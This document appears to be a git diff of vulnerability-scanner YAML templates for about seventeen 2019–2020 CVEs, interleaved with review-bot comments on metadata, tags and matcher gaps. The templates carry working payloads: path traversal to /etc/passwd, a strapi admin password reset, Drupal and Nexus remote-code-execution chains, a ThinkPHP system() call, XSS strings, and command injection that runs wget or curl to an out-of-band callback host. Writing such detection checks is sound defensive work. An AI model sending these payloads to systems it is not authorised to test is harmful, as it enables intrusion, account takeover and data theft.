+++ b/poc/cve/cve-2019-18665(1).yaml @@ -0,0 +1,30 @@ +id: CVE-2019-18665 +info: + name: DOMOS 5.5 - Directory Traversal + author: 0x_Akoko + severity: high + description: | + The Log module in SECUDOS DOMOS before 5.6 allows local file inclusion. + reference: + - https://atomic111.github.io/article/secudos-domos-directory_traversal + - https://vuldb.com/?id.144804 + - https://www.cvedetails.com/cve/CVE-2019-18665 + - https://www.secudos.de/news-und-events/aktuelle-news/domos-release-5-6 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2019-18665 + cwe-id: CWE-22 + tags: cve,cve2019,domos,lfi +requests: + - method: GET + path: + - "{{BaseURL}}/page/sl_logdl?dcfct=DCMlog.download_log&dbkey%3Asyslog.rlog=/etc/passwd" + matchers-condition: and + matchers: + - type: regex + regex: + - "root:[x*]:0:0" + - type: status + status: + - 200 diff --git a/poc/cve/cve-2019-18818-4021.yaml b/poc/cve/cve-2019-18818-4021.yaml new file mode 100644 index 0000000000..5ec5e8c48c --- /dev/null +++ b/poc/cve/cve-2019-18818-4021.yaml 
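Review bot: This template uses the older top-level key `requests:` while the Solr, Openfire and Rumpus files added in the same commit use `http:`; the same applies to the CVE-2019-18818, CVE-2019-20933, CVE-2019-6340, CVE-2019-7238, CVE-2019-7609, CVE-2019-8937, CVE-2019-9915 and CVE-2020-10124 files further down, so pick `http:` throughout. The `(1)` in the file name looks like a download-duplicate suffix; if another file already carries `id: CVE-2019-18665`, the two will both run and report the same finding twice, which is worth checking before merge. The description says the issue is fixed in 5.6, so a `remediation: Upgrade SECUDOS DOMOS to 5.6 or later.` line can be added at no cost.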
@@ -0,0 +1,52 @@ +id: CVE-2019-18818 + +info: + name: strapi CMS Unauthenticated Admin Password Reset + author: idealphase + severity: critical + description: "strapi CMS before 3.0.0-beta.17.5 mishandles password resets within packages/strapi-admin/controllers/Auth.js and packages/strapi-plugin-users-permissions/controllers/Auth.js." + reference: + - https://github.com/advisories/GHSA-6xc2-mj39-q599 + - https://www.exploit-db.com/exploits/50239 + - https://nvd.nist.gov/vuln/detail/CVE-2019-18818 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2019-18818 + cwe-id: CWE-640 + tags: cve,cve2019,strapi,auth-bypass,intrusive + +requests: + - raw: + - | + POST /admin/auth/reset-password HTTP/1.1 + Host: {{Hostname}} + Origin: {{BaseURL}} + Content-Type: application/json + {"code": {"$gt": 0}, "password": "SuperStrongPassword1", "passwordConfirmation": "SuperStrongPassword1"} + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "application/json" + part: header + + - type: word + condition: and + words: + - '"username":' + - '"email":' + - '"jwt":' + part: body + + extractors: + - type: json + json: + - .user.username + - .user.email + +# Enhanced by mp on 2022/04/01 diff --git a/poc/cve/cve-2019-19368.yaml b/poc/cve/cve-2019-19368.yaml new file mode 100644 index 0000000000..f97048a1df --- /dev/null +++ b/poc/cve/cve-2019-19368.yaml 
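Review bot: A match from this template means the request has already replaced the admin password on the scanned host with the fixed string in the body, and that string is published in this repository, so the account stays exposed to anyone until it is rotated. The `intrusive` tag is there, but nothing in `info` tells the operator what the side effect is. I would add `remediation: Upgrade strapi to 3.0.0-beta.17.5 or later; if this template matched, rotate the admin password immediately.` The extractors also write `.user.username` and `.user.email` into scan output, which deserves a comment such as `# results contain account identifiers; treat scan output as sensitive`.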
@@ -0,0 +1,44 @@ +id: CVE-2019-19368 + +info: + name: Rumpus FTP Web File Manager 8.2.9.1 - Cross-Site Scripting + author: madrobot + severity: medium + description: Rumpus FTP Web File Manager 8.2.9.1 contains a reflected cross-site scripting vulnerability via the Login page. An attacker can send a crafted link to end users and can execute arbitrary JavaScript. + remediation: | + Upgrade to the latest version of Rumpus FTP Web File Manager or apply the vendor-provided patch to mitigate this vulnerability. + reference: + - https://github.com/harshit-shukla/CVE-2019-19368/ + - https://www.maxum.com/Rumpus/Download.html + - http://packetstormsecurity.com/files/155719/Rumpus-FTP-Web-File-Manager-8.2.9.1-Cross-Site-Scripting.html + - https://nvd.nist.gov/vuln/detail/CVE-2019-19368 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2019-19368 + cwe-id: CWE-79 + epss-score: 0.00624 + epss-percentile: 0.76551 + cpe: cpe:2.3:a:maxum:rumpus:8.2.9.1:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: maxum + product: rumpus + tags: xss,ftp,packetstorm,cve,cve2019 + +http: + - method: GET + path: + - "{{BaseURL}}/Login?!'>" + + - type: status + status: + - 200 +# digest: 4a0a0047304502206b4916cb37410f9d508ca5012166ced4ae59bad9438ce966b4a00ebf85f0e522022100b73f97f82af6a160dc96df7f314bca674dff1a61b711252ad9e79f5ea602f622:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/cve-2019-19824-4053.yaml b/poc/cve/cve-2019-19824-4053.yaml deleted file mode 100644 index 6ae24e6e21..0000000000 --- a/poc/cve/cve-2019-19824-4053.yaml +++ /dev/null 
@@ -1,33 +0,0 @@ -id: CVE-2019-19824 - -info: - name: TOTOLINK - Remote Code Execution - author: gy741 - severity: high - description: On certain TOTOLINK Realtek SDK based routers, an authenticated attacker may execute arbitrary OS commands via the sysCmd parameter to the boafrm/formSysCmd URI, even if the GUI (syscmd.htm) is not available. This allows for full control over the device's internals. This affects A3002RU through 2.0.0, A702R through 2.1.3, N301RT through 2.1.6, N302R through 3.4.0, N300RT through 3.4.0, N200RE through 4.0.0, N150RT through 3.4.0, and N100RE through 3.4.0. - reference: - - https://sploit.tech/2019/12/16/Realtek-TOTOLINK.html - - https://nvd.nist.gov/vuln/detail/CVE-2019-19824 - - https://cybersecurity.att.com/blogs/labs-research/att-alien-labs-finds-new-golang-malwarebotenago-targeting-millions-of-routers-and-iot-devices-with-more-than-30-exploits - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H - cvss-score: 8.8 - cve-id: CVE-2019-19824 - cwe-id: CWE-78 - tags: cve,cve2019,totolink,rce,router - -requests: - - raw: - - | - POST /boafrm/formSysCmd HTTP/1.1 - Host: {{Hostname}} - Authorization: Basic YWRtaW46cGFzc3dvcmQ= - Content-Type: application/x-www-form-urlencoded - - submit-url=%2Fsyscmd.htm&sysCmdselect=5&sysCmdselects=0&save_apply=Run+Command&sysCmd=wget+http://{{interactsh-url}} - - matchers: - - type: word - part: interactsh_protocol # Confirms the HTTP Interaction - words: - - "http" diff --git a/poc/cve/cve-2019-20210(1).yaml b/poc/cve/cve-2019-20210(1).yaml deleted file mode 100644 index 43994e7cf1..0000000000 --- a/poc/cve/cve-2019-20210(1).yaml +++ /dev/null 
@@ -1,37 +0,0 @@ -id: CVE-2019-20210 -info: - name: CTHthemes CityBook < 2.3.4 - Reflected XSS - author: edoardottt - severity: medium - description: | - The CTHthemes CityBook before 2.3.4, TownHub before 1.0.6, and EasyBook before 1.2.2 themes for WordPress allow Reflected XSS via a search query. - reference: - - https://wpscan.com/vulnerability/10013 - - https://nvd.nist.gov/vuln/detail/CVE-2019-20210 - - https://wpvulndb.com/vulnerabilities/10018 - - https://cxsecurity.com/issue/WLB-2019120112 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2019-20210 - cwe-id: CWE-79 - tags: cve,cve2019,wordpress,citybook,xss,wp-theme -requests: - - method: GET - path: - - "{{BaseURL}}/?search_term=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&location_search=&nearby=off&address_lat=&address_lng=&distance=10&lcats%5B%5D=" - matchers-condition: and - matchers: - - type: word - part: body - words: - - "" - - "/wp-content/themes/citybook" - condition: and - - type: word - part: header - words: - - text/html - - type: status - status: - - 200 diff --git a/poc/cve/cve-2019-20224(1).yaml b/poc/cve/cve-2019-20224(1).yaml deleted file mode 100644 index b7a2d0559b..0000000000 --- a/poc/cve/cve-2019-20224(1).yaml +++ /dev/null 
@@ -1,48 +0,0 @@ -id: CVE-2019-20224 -info: - name: Pandora FMS 7.0NG - Remote Command Injection - author: ritikchaddha - severity: high - description: | - Pandora FMS 7.0NG allows remote authenticated users to execute arbitrary OS commands via shell metacharacters in the ip_src parameter in an index.php?operation/netflow/nf_live_view request. - reference: - - https://shells.systems/pandorafms-v7-0ng-authenticated-remote-code-execution-cve-2019-20224/ - - https://gist.github.com/mhaskar/2153d66a0928492d76b799ba13b9e3f9 - - https://nvd.nist.gov/vuln/detail/CVE-2019-20224 - - https://drive.google.com/file/d/1DkWR5MylzeNr20jmHXTaAIJmf3YN-lnO/view - remediation: This issue has been fixed in Pandora FMS 7.0 NG 742. - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H - cvss-score: 8.8 - cve-id: CVE-2019-20224 - cwe-id: CWE-78 - tags: pandorafms,rce,cve,cve2019,authenticated,oast -requests: - - raw: - - | - POST /pandora_console/index.php?login=1 HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - nick=admin&pass=admin&login_button=Login - - | - POST /pandora_console/index.php?sec=netf&sec2=operation/netflow/nf_live_view&pure=0 HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - date=0&time=0&period=0&interval_length=0&chart_type=netflow_area&max_aggregates=1&address_resolution=0&name=0&assign_group=0&filter_type=0&filter_id=0&filter_selected=0&ip_dst=0&ip_src=%22%3Bcurl+{{interactsh-url}}+%23&draw_button=Draw - cookie-reuse: true - redirects: true - max-redirects: 2 - matchers-condition: and - matchers: - - type: word - part: interactsh_protocol - name: http - words: - - "http" - - type: status - status: - - 200 - -# Enhanced by mp on 2022/06/17 diff --git a/poc/cve/cve-2019-20933(1).yaml b/poc/cve/cve-2019-20933(1).yaml new file mode 100644 index 0000000000..c690a67121 --- /dev/null +++ b/poc/cve/cve-2019-20933(1).yaml 
@@ -0,0 +1,32 @@ +id: CVE-2019-20933 +info: + name: InfluxDB before 1.7.6 has an authentication bypass vulnerability in the authenticate function in services/httpd/handler.go because a JWT token may have an empty SharedSecret + author: c-sh0 + severity: critical + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2019-20933 + - https://github.com/influxdata/influxdb/issues/12927 + - https://github.com/c-sh0/security/blob/master/influxdb.txt + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2019-20933 + cwe-id: CWE-287 + tags: cve,cve-2019,influxdb,auth-bypass +requests: + - method: GET + path: + - "{{BaseURL}}/query?q=SHOW%20DATABASES" + headers: + Authorization: Bearer {{token}} + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + part: body + words: + - '"results":' + - '"name":"databases"' + condition: and diff --git a/poc/cve/cve-2019-2616(1).yaml b/poc/cve/cve-2019-2616(1).yaml deleted file mode 100644 index f6c8aa1ffb..0000000000 --- a/poc/cve/cve-2019-2616(1).yaml +++ /dev/null 
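Review bot: `Authorization: Bearer {{token}}` relies on a variable that the template never defines or documents, so unless the operator happens to pass one the check presumably cannot run and the host is reported clean. State the requirement next to the header, e.g. `# {{token}} must be supplied by the operator (-var token=...)`. The same gap exists for `{{username}}` and `{{password}}` in `cve-2019-9915(1).yaml` later in this commit. The tag `cve-2019` also breaks the `cve2019` convention every other template here follows, so tag filters will skip this file; use `tags: cve,cve2019,influxdb,auth-bypass`. Finally the `name` field holds the full description; move that sentence to `description:` and keep the name short.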
@@ -1,29 +0,0 @@ -id: CVE-2019-2616 -info: - name: XXE in Oracle Business Intelligence and XML Publisher - author: pdteam - severity: high - description: Oracle Business Intelligence / XML Publisher 11.1.1.9.0 / 12.2.1.3.0 / 12.2.1.4.0 - XML External Entity Injection - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2019-2616 - - https://www.exploit-db.com/exploits/46729 - - http://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N - cvss-score: 7.2 - cve-id: CVE-2019-2616 - tags: cve,cve2019,oracle,xxe,oast,kev -requests: - - raw: - - | - POST /xmlpserver/ReportTemplateService.xls HTTP/1.1 - Host: {{Hostname}} - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 - Content-Type: text/xml; charset=UTF-8 - - - matchers: - - type: word - part: interactsh_protocol # Confirms the HTTP Interaction - words: - - "http" diff --git a/poc/cve/cve-2019-2767-4117.yaml b/poc/cve/cve-2019-2767-4117.yaml deleted file mode 100644 index bf1dcb703f..0000000000 --- a/poc/cve/cve-2019-2767-4117.yaml +++ /dev/null 
@@ -1,27 +0,0 @@ -id: CVE-2019-2767 - -info: - name: Oracle Business Intelligence - Publisher XXE - author: madrobot - severity: high - description: There is an XXE vulnerability in the BI Publisher (formerly XML Publisher) component of Oracle Fusion Middleware. The supported versions affected are 11.1.1.9.0, 12.2.1.3.0 and 12.2.1.4.0. This easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise BI Publisher. - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2019-2767 - - https://www.exploit-db.com/exploits/46729 - tags: cve,cve2019,oracle,xxe,oast - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N - cvss-score: 7.20 - cve-id: CVE-2019-2767 - -requests: - - raw: - - | - GET /xmlpserver/convert?xml=<%3fxml+version%3d"1.0"+%3f>%25sp%3b%25param1%3b]>&_xf=Excel&_xl=123&template=123 HTTP/1.1 - Host: {{Hostname}} - - matchers: - - type: word - part: interactsh_protocol # Confirms the HTTP Interaction - words: - - "http" diff --git a/poc/cve/cve-2019-6340(1).yaml b/poc/cve/cve-2019-6340(1).yaml new file mode 100644 index 0000000000..e6d6680309 --- /dev/null +++ b/poc/cve/cve-2019-6340(1).yaml 
@@ -0,0 +1,34 @@ +id: CVE-2019-6340 +info: + name: Drupal 8 core RESTful Web Services RCE + author: madrobot + severity: high + description: Some field types do not properly sanitize data from non-form sources in Drupal 8.5.x before 8.5.11 and Drupal 8.6.x before 8.6.10. This can lead to arbitrary PHP code execution in some cases. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2019-6340 + - https://www.drupal.org/sa-core-2019-003 + - http://web.archive.org/web/20210125004201/https://www.securityfocus.com/bid/107106/ + - https://www.synology.com/security/advisory/Synology_SA_19_09 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.1 + cve-id: CVE-2019-6340 + cwe-id: CWE-502 + tags: cve,cve2019,drupal,rce,kev +requests: + - method: POST + path: + - '{{BaseURL}}/node/1?_format=hal_json' + body: '{ "link": [ { "value": "link", "options": "O:24:\"GuzzleHttp\\Psr7\\FnStream\":2:{s:33:\"\u0000GuzzleHttp\\Psr7\\FnStream\u0000methods\";a:1:{s:5:\"close\";a:2:{i:0;O:23:\"GuzzleHttp\\HandlerStack\":3:{s:32:\"\u0000GuzzleHttp\\HandlerStack\u0000handler\";s:2:\"id\";s:30:\"\u0000GuzzleHttp\\HandlerStack\u0000stack\";a:1:{i:0;a:1:{i:0;s:6:\"system\";}}s:31:\"\u0000GuzzleHttp\\HandlerStack\u0000cached\";b:0;}i:1;s:7:\"resolve\";}}s:9:\"_fn_close\";a:2:{i:0;r:4;i:1;s:7:\"resolve\";}}" } ], "_links": { "type": { "href": "http://192.168.1.25/drupal-8.6.9/rest/type/shortcut/default" } } }' + matchers-condition: and + matchers: + - type: word + words: + - "uid=" + - "gid=" + - "groups=" + condition: and + part: body + - type: status + status: + - 200 diff --git a/poc/cve/cve-2019-7238-4207.yaml b/poc/cve/cve-2019-7238-4207.yaml new file mode 100644 index 0000000000..e6d8c9427e --- /dev/null +++ b/poc/cve/cve-2019-7238-4207.yaml 
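Review bot: The request body embeds an address from the author's lab, `http://192.168.1.25/drupal-8.6.9/rest/type/shortcut/default`, so the scanner sends a private-network URL to every target; whether the check still works on a host with a different base URL cannot be judged from this hunk and should be verified before the template is trusted for a clean result. The matchers show that a command is run on the target, yet the tags do not include `intrusive` as the strapi template's do: `tags: cve,cve2019,drupal,rce,kev,intrusive`. The description already names the fixed releases, so add `remediation: Upgrade to Drupal 8.5.11, 8.6.10 or later.`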
@@ -0,0 +1,37 @@ +id: CVE-2019-7238 + +info: + name: NEXUS < 3.14.0 Remote Code Execution + author: pikpikcu + severity: critical + tags: cve,cve2019,nexus,rce + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2019-7238 + - https://github.com/jas502n/CVE-2019-7238 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2019-7238 + description: "Sonatype Nexus Repository Manager before 3.15.0 has Incorrect Access Control." + +requests: + - raw: + - | + POST /service/extdirect HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + X-Requested-With: XMLHttpRequest + + {"action": "coreui_Component", "type": "rpc", "tid": 8, "data": [{"sort": [{"direction": "ASC", "property": "name"}], "start": 0, "filter": [{"property": "repositoryName", "value": "*"}, {"property": "expression", "value": "function(x, y, z, c, integer, defineClass){ c=1.class.forName('java.lang.Character'); integer=1.class; x='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'; y=0; z=''; while (y lt x.length()){ z += c.toChars(integer.parseInt(x.substring(y, y+2), 16))[0]; y += 2; };defineClass=2.class.forName('java.lang.Thread');x=defineClass.getDeclaredMethod('currentThread').invoke(null);y=defineClass.getDeclaredMethod('getContextClassLoader').invoke(x);defineClass=2.class.forName('java.lang.ClassLoader').getDeclaredMethod('defineClass','1'.class,1.class.forName('[B'),1.class.forName('[I').getComponentType(),1.class.forName('[I').getComponentType()); \ndefineClass.setAccessible(true);\nx=defineClass.invoke(\n y,\n 'Exploit.Test234',\n z.getBytes('latin1'), 0,\n 3054\n);x.getMethod('test', ''.class).invoke(null, 'cat /etc/passwd');'done!'}\n"}, {"property": "type", "value": "jexl"}], "limit": 50, "page": 1}], "method": "previewAssets"} + + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + part: body + + - type: status + status: + - 200 
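Review bot: `name` says `NEXUS < 3.14.0` while `description` says the issue affects Sonatype Nexus Repository Manager before 3.15.0, so the two fields give different upgrade targets to whoever triages a hit. Align them on the description, `name: Sonatype Nexus Repository Manager <3.15.0 - Remote Code Execution`, and add `remediation: Upgrade Nexus Repository Manager to 3.15.0 or later.` The request reads a system file on the target, so the tags should also include `intrusive`, as the strapi template in this commit does.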
diff --git a/poc/cve/cve-2019-7609-4233.yaml b/poc/cve/cve-2019-7609-4233.yaml new file mode 100644 index 0000000000..dc14d4219e --- /dev/null +++ b/poc/cve/cve-2019-7609-4233.yaml @@ -0,0 +1,35 @@ +id: CVE-2019-7609 +info: + name: Kibana Timelion Arbitrary Code Execution + author: dwisiswant0 + severity: critical + description: Kibana versions before 5.6.15 and 6.6.1 contain an arbitrary code execution flaw in the Timelion visualizer. An attacker with access to the Timelion application could send a request that will attempt to execute javascript code. This could possibly lead to an attacker executing arbitrary commands with permissions of the Kibana process on the host system. + reference: + - https://github.com/mpgn/CVE-2019-7609 + - https://discuss.elastic.co/t/elastic-stack-6-6-1-and-5-6-15-security-update/169077 + tags: cve,cve2019,kibana,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10.00 + cve-id: CVE-2019-7609 + cwe-id: CWE-94 +requests: + - method: POST + path: + - "{{BaseURL}}/api/timelion/run" + headers: + Content-Type: "application/json; charset=utf-8" + body: '{"sheet":[".es(*)"],"time":{"from":"now-1m","to":"now","mode":"quick","interval":"auto","timezone":"Asia/Shanghai"}}' + matchers-condition: and + matchers: + - type: word + words: + - "seriesList" + part: body + - type: word + words: + - "application/json" + part: header + - type: status + status: + - 200 diff --git a/poc/cve/cve-2019-8446-4252.yaml b/poc/cve/cve-2019-8446-4252.yaml deleted file mode 100644 index 99959daaf4..0000000000 --- a/poc/cve/cve-2019-8446-4252.yaml +++ /dev/null 
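Review bot: The matchers only confirm that `/api/timelion/run` answered a plain `.es(*)` expression with a 200 JSON response containing `seriesList`, so this reports `severity: critical` for any Kibana whose Timelion endpoint is reachable, patched or not. The description limits the flaw to versions before 5.6.15 and 6.6.1, and nothing in the template checks the version. Either add a version check or make the limitation explicit with a comment such as `# detects a reachable Timelion endpoint only; confirm the Kibana version (<5.6.15 / <6.6.1) before reporting` and add `remediation: Upgrade Kibana to 5.6.15, 6.6.1 or later.`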
@@ -1,39 +0,0 @@ -id: CVE-2019-8446 - -info: - name: Jira Improper Authorization - description: The /rest/issueNav/1/issueTable resource in Jira before version 8.3.2 allows remote attackers to enumerate usernames via an incorrect authorisation check. - author: dhiyaneshDk - severity: medium - tags: cve,cve2019,jira - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - cvss-score: 5.30 - cve-id: CVE-2019-8446 - cwe-id: CWE-863 - reference: - - https://jira.atlassian.com/browse/JRASERVER-69777 - - https://www.talosintelligence.com/vulnerability_reports/TALOS-2019-0839 - -requests: - - raw: - - | - POST /rest/issueNav/1/issueTable HTTP/1.1 - Host: {{Hostname}} - Connection: Close - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 - X-Atlassian-Token: no-check - Accept-Encoding: gzip, deflate - Accept-Language: en-US,en;q=0.9 - - {'jql':'project in projectsLeadByUser("{{randstr}}")'} - - matchers-condition: and - matchers: - - type: word - words: - - "the user does not exist" - part: body - - type: status - status: - - 200 diff --git a/poc/cve/cve-2019-8903.yaml b/poc/cve/cve-2019-8903.yaml deleted file mode 100644 index 5e9901b6e8..0000000000 --- a/poc/cve/cve-2019-8903.yaml +++ /dev/null 
@@ -1,45 +0,0 @@ -id: CVE-2019-8903 - -info: - name: Totaljs <3.2.3 - Local File Inclusion - author: madrobot - severity: high - description: Total.js Platform before 3.2.3 is vulnerable to local file inclusion. - remediation: | - Upgrade Totaljs to version 3.2.3 or later to fix the LFI vulnerability. - reference: - - https://blog.certimetergroup.com/it/articolo/security/total.js-directory-traversal-cve-2019-8903 - - https://github.com/totaljs/framework/commit/c37cafbf3e379a98db71c1125533d1e8d5b5aef7 - - https://github.com/totaljs/framework/commit/de16238d13848149f5d1dae51f54e397a525932b - - https://nvd.nist.gov/vuln/detail/CVE-2019-8903 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2019-8903 - cwe-id: CWE-22 - epss-score: 0.01071 - epss-percentile: 0.82558 - cpe: cpe:2.3:a:totaljs:total.js:*:*:*:*:*:node.js:*:* - metadata: - max-request: 1 - vendor: totaljs - product: total.js - framework: node.js - tags: cve,cve2019,totaljs,lfi - -http: - - method: GET - path: - - "{{BaseURL}}/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/var/www/html/index.html" - - matchers-condition: and - matchers: - - type: word - part: body - words: - - "apache2.conf" - - - type: status - status: - - 200 -# digest: 4a0a00473045022100c7126e080faa3eb1531fe5faa823ef4a6c7f6271e47b3afbe49b8c9650166af00220176776ec7fd2240c424e2621f78179020d06d8a4a1f7aee783b8c8660f26c529:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/cve-2019-8937-4278.yaml b/poc/cve/cve-2019-8937-4278.yaml new file mode 100644 index 0000000000..fc33321181 --- /dev/null +++ b/poc/cve/cve-2019-8937-4278.yaml 
@@ -0,0 +1,36 @@ +id: CVE-2019-8937 +info: + name: HotelDruid 2.3.0 - XSS + author: LogicalHunter + severity: medium + reference: https://www.exploit-db.com/exploits/46429 + tags: cve,cve2019,xss,hoteldruid + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2019-8937 + cwe-id: CWE-79 + description: "HotelDruid 2.3.0 has XSS affecting the nsextt, cambia1, mese_fine, origine, and anno parameters in creaprezzi.php, tabella3.php, personalizza.php, and visualizza_tabelle.php." +requests: + - method: GET + path: + - '{{BaseURL}}/hoteldruid/visualizza_tabelle.php?anno=2019&id_sessione=&tipo_tabella=prenotazioni&subtotale_selezionate=1&num_cambia_pren=1&cerca_id_passati=1&cambia1=3134671%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + # - '{{BaseURL}}/hoteldruid/visualizza_tabelle.php?nsextt=x">' + + # - '{{BaseURL}}/hoteldruid/visualizza_tabelle.php?anno=2019&id_sessione=&tipo_tabella=periodi&mese_fine=13">' + + # - '{{BaseURL}}/hoteldruid/personalizza.php?anno=2019&id_sessione=&aggiorna_qualcosa=SI&cambianumerotariffe=1&nuovo_numero_tariffe=8&origine=./creaprezzi.php">' + + # - '{{BaseURL}}/hoteldruid/tabella3.php?id_sessione=&mese=01&tutti_mesi=1&anno=2019">' + + # - '{{BaseURL}}/hoteldruid/creaprezzi.php?anno=2019&id_sessione=&ins_rapido_costo=SI&tipocostoagg=perm_min&origine=crearegole.php">' + matchers-condition: and + matchers: + - type: word + words: + - '"' + part: body + - type: word + words: + - "text/html" + part: header diff --git a/poc/cve/cve-2019-9082-4292.yaml b/poc/cve/cve-2019-9082-4292.yaml deleted file mode 100644 index 29138a2552..0000000000 --- a/poc/cve/cve-2019-9082-4292.yaml +++ /dev/null 
@@ -1,23 +0,0 @@ -id: CVE-2019-9082 -info: - name: ThinkPHP RCE - author: medbsq - severity: high -# https://www.cvebase.com/cve/2019/9082 -requests: - - method: POST - path: - - "{{BaseURL}}/index.php?s=captcha" - headers: - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 - body: _method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=id - matchers-condition: and - matchers: - - type: word - words: - - "uid" - condition: or - part: body - - type: status - status: - - 206 diff --git a/poc/cve/cve-2019-9915(1).yaml b/poc/cve/cve-2019-9915(1).yaml new file mode 100644 index 0000000000..0127935998 --- /dev/null +++ b/poc/cve/cve-2019-9915(1).yaml @@ -0,0 +1,32 @@ +id: CVE-2019-9915 +info: + name: GetSimpleCMS 3.3.13 - Open Redirection + author: 0x_Akoko + severity: medium + description: GetSimpleCMS 3.3.13 has an Open Redirect via the admin/index.php redirect parameter. + reference: + - https://www.invicti.com/web-applications-advisories/ns-18-056-open-redirection-vulnerability-in-getsimplecms + - https://github.com/GetSimpleCMS/GetSimpleCMS/issues/1300 + - https://www.cvedetails.com/cve/CVE-2019-9915 + - https://www.netsparker.com/web-applications-advisories/ns-18-056-open-redirection-vulnerability-in-getsimplecms/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2019-9915 + cwe-id: CWE-601 + metadata: + verified: "true" + tags: cve,cve2019,redirect,getsimple,cms +requests: + - raw: + - | + POST /admin/index.php?redirect=https://interact.sh/ HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + userid={{username}}&pwd={{password}}&submitted=Login + matchers: + - type: regex + part: header + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/' # https://regex101.com/r/ZDYhFh/1 
diff --git a/poc/cve/cve-2020-10124(1).yaml b/poc/cve/cve-2020-10124(1).yaml new file mode 100644 index 0000000000..065a434919 --- /dev/null +++ b/poc/cve/cve-2020-10124(1).yaml @@ -0,0 +1,31 @@ +id: CVE-2020-10124 +info: + name: SolarWindsOrion LFI + author: medbsq + severity: medium +#- https://www.cvebase.com/cve/2019/11043 + +requests: + - method: GET + path: + - "{{BaseURL}}/web.config.i18n.ashx?l=j&v=j" + - "{{BaseURL}}/SWNetPerfMon.db.i18n.ashx?l=j&v=j" + headers: + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 + matchers-condition: and + matchers: + - type: word + words: + - "SolarWinds.Orion.Core.Common." + - "Connection String" + condition: or + part: body + - type: word + words: + - "text/plain" + - "SolarWindsOrionDatabaseUser" + condition: or + part: header + - type: status + status: + - 200 diff --git a/poc/cve/cve-2020-10220.yaml b/poc/cve/cve-2020-10220.yaml deleted file mode 100644 index 2cc4bdf147..0000000000 --- a/poc/cve/cve-2020-10220.yaml +++ /dev/null 
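Review bot: The `id` (CVE-2020-10124), the name (`SolarWindsOrion LFI`) and the only reference (`#- https://www.cvebase.com/cve/2019/11043`, a comment rather than a `reference:` entry) do not agree with each other, so a hit from this template cannot be traced to an advisory; verify the CVE id against NVD before merging. The template has no `description`, `classification` or `tags`, unlike every other file in this commit, which also means tag-based selection never picks it up. In the header matcher, `SolarWindsOrionDatabaseUser` sits next to `text/plain` under `condition: or`, so any `text/plain` response satisfies it; that word looks as if it belongs in the body matcher.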
